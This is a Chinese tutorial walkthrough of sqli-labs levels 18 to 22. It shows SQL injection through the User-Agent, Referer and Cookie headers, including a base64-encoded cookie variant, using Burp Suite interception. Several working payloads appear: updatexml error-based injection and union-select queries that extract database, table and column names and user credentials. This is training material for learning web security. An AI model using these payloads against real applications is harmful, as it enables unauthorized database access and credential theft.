当前位置: 首页 > news >正文

计算机网络资源网站建设论文网站空间 推荐

计算机网络资源网站建设论文,网站空间 推荐,申请网站就是做网站吗,聊城做网站的公司行情前言 前面的关卡,都是直接在输入框或者浏览器的地址栏上做文章即可。但本文这几关,需要用工具拦截请求修改请求头部才行。 Less18(User-Agent注入) 本关的注入点在User-Agent。我们在用户名和密码框中输入admin/admin后&#xf…

前言

前面的关卡,都是直接在输入框或者浏览器的地址栏上做文章即可。但本文这几关,需要用工具拦截请求修改请求头部才行。

Less18(User-Agent注入)

本关的注入点在User-Agent。我们在用户名和密码框中输入admin/admin后,会回显User-Agent的信息。注意这里只有输入了正确的密码才回回显。

PS:如果admin/admin密码不对,就去Less17那里改就行了~~~~

我们看一下源码,在less18目录下的index.php:

分析代码后,我们发现uagent这个变量获取的是user-agent的数据,而注入点在103行这里,输出页面反馈的在109行。

User-Agent的注入我们需要借助一些工具,可以使用postman或者burp suit等。这里我会使用burp suit操作。

没用过burp suit的读者先下载并打开临时项目。然后使用内嵌浏览器:

之后在内嵌浏览器中打开Less18的页面。

然后要打开拦截请求,拦截一会发送的请求:

接着在用户名框和密码框输入admin和admin

此时发现burp suit已经对请求进行拦截:

然后点击右键,选择“发送到repeater”,然后我们在重放器进行操作。

这里我们尝试吧User-Agent的内容改为:

' and updatexml(1,'~',3) and '

看到这里通过updatexml大法,已经通过user-agent回显了。后面可以按照Less7的思路把数据库和用户名那些爆破出来。

查找当前数据库名:

' or updatexml(1,concat(0x7e,(select database()),0x7e),3) or '

接着查询表,当limit到4时查到users表:

' or updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema=database() limit 3,1)),3) or '

接着是查询列名,还是按照less7的思路,在limit到4、5时找到username和password:

' or updatexml(1,concat('~',(select column_name from information_schema.columns where table_name='users' limit 4,1)),3) or '
' or updatexml(1,concat('~',(select column_name from information_schema.columns where table_name='users' limit 5,1)),3) or '

最后是查出用户名密码,

' or updatexml(1,concat('~',(select username from security.users limit 0,1)),3) or '
' or updatexml(1,concat('~',(select password from security.users limit 0,1)),3) or '

Less19(Referer注入)

先输入用户名密码admin/admin

显示的是Refer的数据,所以考虑注入点和Referer有关。

同样先分析sqli-labs/less19/index.php源文件

与Less18不同的地方在于uagent变量获取的是Referer这个参数。所以操作方式和Less18是一摸一样的。

具体的操作参照Less18,语句完全一样,仅仅是把原来放在user-agent的改成放到referer那里就可以了。

Less20(Cookie注入)

输入用户名密码admin/admin之后:

这里显示了cookie,而且从这关的标题看,写的是cookie注入。所以很显然这关的目标涉及cookie。

 

分析代码后,我们看到147行显然是一个注入点。因为cookee这个变量直接从COOKIE那里获取uname数据,然后直接放到sql语句去执行,没有进行一些处理!

现在开始操作,基本参考Less1就可以了。我们在登录之后,刷新页面并用burp suit拦截请求,右键把请求发到重放器中,修改cookie的值,判断select的列数:

admin' order by 5 #

使用单引号闭合,然后order by看来select的列数。我们尝试5是失败的,最终尝试3时会成功:

admin' order by 3 #

接下来我们用联合注入方式:

' union select 1,2,3 #

看到联合注入的参数已经回显到前端。

接下来是查询库名:

' union select 1,database(),3 #

表名:

' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #

列名:

' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' #

 最后找出用户名密码:

Less21 

21关和20关差不多。我们看了拦截的请求,cookie是用base64编码过的

分析源码:

在146行是注入点,闭合方式是单引号+右括号。

语句基本和Less20差不多,就是闭合方式改变,并且要先用base64转码。比如查询数据库语句为:

') union select 1,database(),3 #

然后我们用base64转码,可以用在线方式,也可以自己写脚本,或者用离线工具koczkatamas等等。转码得到:

JykgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSwzICM=

 其他查询也是类似的方式即可,不再赘述。

Less22

Less22和21差不多,都是cookie要做base64编码。区别是变成了双引号闭合,所以也不赘述。

小结

本文主要演示了请求头部的一些注入点,包括User-Agent、Referer和Cookie。其实现方式大同小异。但头部注入的操作比前面get和post会麻烦一些,需要拦截请求并修改头部信息。

http://www.dtcms.com/a/457819.html

相关文章:

  • 自助建站的平台wordpress 文章循环
  • Photoshop - Photoshop 工具栏(9)裁剪工具
  • 【练】C程序设计-01程序设计和C语言
  • 使用 Gunicorn 部署 FastAPI 应用程序:快速而强大的组合
  • JavaScript是web开发中一种功能强大的编程语言,
  • 网站建设策划实施要素无锡常州网络推广
  • 东莞建外贸网站龙华专业做网站公司
  • 通俗易懂的理解Vue.js
  • 【开题答辩全过程】以 爱心慈善公益网站为例,包含答辩的问题和答案
  • 【云基础】容器管理工具Containerd
  • 大数据毕业设计-基于大数据的BOSS直聘岗位招聘数据可视化分析系统(高分计算机毕业设计选题·定制开发·真正大数据·机器学习毕业设计)
  • 网站开发建设培训网站策划书预期风险
  • aspnet网站模板人人秀h5页面制作软件
  • mysql数据库学习之高级进阶(七)
  • 做网站的书知乎建地方的网站前景
  • 数字化转型:概念性名词浅谈(第六十七讲)
  • Arduino开发ESP32连接手机热点【适合新手】
  • 网站搭建策划书网站备案流程审核单
  • 网站源码交易平台郑州阿里巴巴网站建设
  • 教育培训手机网站模板下载电脑端网站和手机网站区别
  • 集成热部署
  • 【代码随想录算法训练营——Day28】贪心算法——56.合并区间、738.单调递增的数字、968.监控二叉树
  • 河北建设执业资格注册中心网站响应式网站 软件
  • tuchuang_共享文件_图片_取消_删除
  • 基因组组装:1. Hifiasm 组装参考基因组
  • 网站制作设计专业公司网络营销个人总结
  • 力扣2779. 数组的最大美丽值
  • 深圳做分销网站北京搭建工厂
  • 甘肃省建设厅执业资格注册中心网站通知网站开发三个月能学会吗
  • 石家庄手机网站建设装饰装修网站大全